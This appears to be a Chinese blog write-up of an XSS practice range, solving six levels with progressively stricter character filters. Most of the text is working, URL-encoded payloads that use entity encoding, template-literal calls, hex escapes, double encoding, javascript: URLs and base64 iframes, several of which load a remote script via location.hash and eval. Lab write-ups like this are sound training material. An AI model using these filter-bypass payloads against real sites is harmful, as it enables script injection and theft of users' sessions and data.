感谢大佬的靶场和思路,pdf:xss修炼之独孤九剑.pdf
奇怪的xss姿势增加了.jpg
0x01 第一式
提示过滤了=()
思路:在<svg>标签中的<sciprt>标签可以执行html编码
alert(1) 对应的html实体编码为:alert(1)
最后payload为:
"><svg><script>alert(1)</script></svg>
将其url编码一下,得到:http://xcao.vip/test/xss1.php?data="><svg><script>%26%23x61%3b%26%23x6C%3b%26%23x65%3b%26%23x72%3b%26%23x74%3b%26%23x28%3b%26%23x31%3b%26%23x29%3b<%2fscript><%2fsvg>触发xss
接下来加载alert.js,我们可以将需要执行的js代码藏在url的#号后面
然后使用 location.hash获取 #+#号后面的内容
location.hash.slice(1)去除#号,再用eval(location.hash.slice(1))执行,
eval(location.hash.slice(1))对应的html实体编码为:eval(location.hash.slice(1))
最终payload1:http://xcao.vip/test/xss1.php?data="><svg><script>%26%23x65%3b%26%23x76%3b%26%23x61%3b%26%23x6c%3b%26%23x28%3b%26%23x6c%3b%26%23x6f%3b%26%23x63%3b%26%23x61%3b%26%23x74%3b%26%23x69%3b%26%23x6f%3b%26%23x6e%3b%26%23x2e%3b%26%23x68%3b%26%23x61%3b%26%23x73%3b%26%23x68%3b%26%23x2e%3b%26%23x73%3b%26%23x6c%3b%26%23x69%3b%26%23x63%3b%26%23x65%3b%26%23x28%3b%26%23x31%3b%26%23x29%3b%26%23x29%3b<%2fscript><%2fsvg>#with(document)body.appendChild(createElement('script')).src='http://xcao.vip/xss/alert.js'最终payload2:
http://xcao.vip/test/xss1.php?data=%22%3E%3Cscript%3Eeval.call`${location[%27hash%27][%27slice%27]`1`}`%3C/script%3E#with(document)body.appendChild(createElement('script')).src='http://xcao.vip/xss/alert.js'
0x02 第二式
提示过滤了=().
第一式的第一种解法可以使用在es6语法中``是可以代替括号使用的
因此可以使用setTimeout函数去触发代码 setTimeout`代码`
同时可以将代码编码成\uXXXX或者\xXX格式绕过限制
将eval(location.hash.slice(1))进行\xXX格式的编码
最终payload:http://xcao.vip/test/xss2.php?data=%22%3E%3Cscript%3EsetTimeout`\x65\x76\x61\x6C\x28\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x61\x73\x68\x2E\x73\x6C\x69\x63\x65\x28\x31\x29\x29`%3C/script%3E#with(document)body.appendChild(createElement('script')).src='http://xcao.vip/xss/alert.js'
0x03 第三式
过滤了().&#\,开放了=号
开放了等于号直接使用<script src='http://xcao.vip/xss/alert.js'></script>
这里还过滤了.号,直接二次编码为%252e完事
最终payload:http://xcao.vip/test/xss3.php?data=%22%3E%3Cscript%20src=%27http://xcao%252evip/xss/alert%252ejs%27%3E%3C/script%3E
0x04 第四式
过滤了=().&#\
大佬的思路是用 url编码+javasjcript伪协议 绕过过滤
document.location.assign再用location['assign'](location['replace']也可以)表示,然后再给javascript伪协议再套一层eval函数
最终payload为:http://xcao.vip/test/xss4.php?data=%22%3E%3Cscript%3Elocation[%27assign%27]`javascript:eval%2528eval%2528location%252ehash%252eslice%25281%2529%2529%2529`%3C/script%3E#with(document)body.appendChild(createElement('script')).src='http://xcao.vip/xss/alert.js'
0x05 第五式
过滤了().&#\%
大佬的思路是借助十进制ip,绕过.号
其实还可以利用iframe标签加base64编码http://xcao.vip/test/xss5.php?data=1%22%3E%3Cscript%3Etop[%22document%22][%22write%22]`${%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%3Etest%3C/iframe%3E%22}%20%3Ciframe%20src=`%3C/script%3E
0x06 第六式
过滤了=().&#\%
在第五式的基础上使用top['String']['fromCharCode']`61`代替等号
最终payload:http://xcao.vip/test/xss6.php?data=1%22%3E%3Cscript%3Etop[%22document%22][%22write%22]`${top[%22String%22][%22fromCharCode%22]`61`%2b%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%3E111%3C/iframe%3E%22}%20%3Ciframe%20src`%3C/script%3E%http://xcao.vip/test/xss6.php/?data=%22%3E%3Cscript%3Edocument[%22write%22]`${location[%27hash%27][%27slice%27]`1`}%3Cimg%20`%3C/script%3E#src='x'onerror=with(document)body.appendChild(createElement('script')).src='http://xcao.vip/test/alert.js'//
剩下的七八九式就不玩了,不得不说大佬们tql
网友评论